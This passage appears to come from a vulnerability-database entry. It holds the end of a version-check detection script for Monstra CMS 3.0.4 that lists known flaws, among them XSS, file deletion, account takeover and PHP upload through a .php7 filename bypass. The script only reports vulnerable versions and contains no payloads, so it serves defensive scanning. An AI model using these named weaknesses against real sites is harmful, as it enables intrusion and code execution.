Direct Object Reference\n in admin/index.php?id=users&action=edit&user_id=1.\n\n - Monstra does not properly restrict modified Snippet content, as demonstrated by the\n admin/index.php?id=snippets&action=edit_snippet&filename=google-analytics URI,\n which leads to arbitrary code execution.\n\n - The admin/index.php page allows XSS via the page_meta_title parameter in an edit_page&name=error404 action,\n an add_page action or an edit_page action.\n\n - HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.\n\n - Information leakage risk (e.g., PATH, DOCUMENT_ROOT, and SERVER_ADMIN)\n in libraries/Gelato/ErrorHandler/Resources/Views/Errors/exception.php.\n\n - XSS vulnerability when one tries to register an account with a crafted password parameter to users/registration.\n\n - Arbitrary file deletion vulnerability in admin/index.php.\n\n - Stored XSS vulnerability in admin/index.php?id=filesmanager via\n JavaScript content in a file whose name lacks an extension.\n\n - Arbitrary directory listing vulnerability in admin/index.php.\n\n - XSS via index.php.\n\n - A remote authenticated user may take over arbitrary user accounts via a modified login parameter to an edit URI.\n\n - Remote authenticated users may upload and execute arbitrary PHP code via admin/index.php?id=filesmanager\n because, for example, .php filenames are blocked but .php7 filenames are not.\");\n script_tag(name:\"affected\", value:\"Monstra CMS through version 3.0.4.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\n\n Note: Monstra CMS is deprecated / not supported anymore by the vendor.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/monstra-cms/monstra/issues/443\");\n script_xref(name:\"URL\", value:\"https://github.com/monstra-cms/monstra/issues/444\");\n script_xref(name:\"URL\", value:\"https://github.com/monstra-cms/monstra/issues/445\");\n script_xref(name:\"URL\", value:\"https://github.com/monstra-cms/monstra/issues/446\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:monstra:monstra\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less_equal( version: version, test_version: \"3.0.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"None\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

Monstra CMS 3.0.4 Remote Code Execution

Description

Related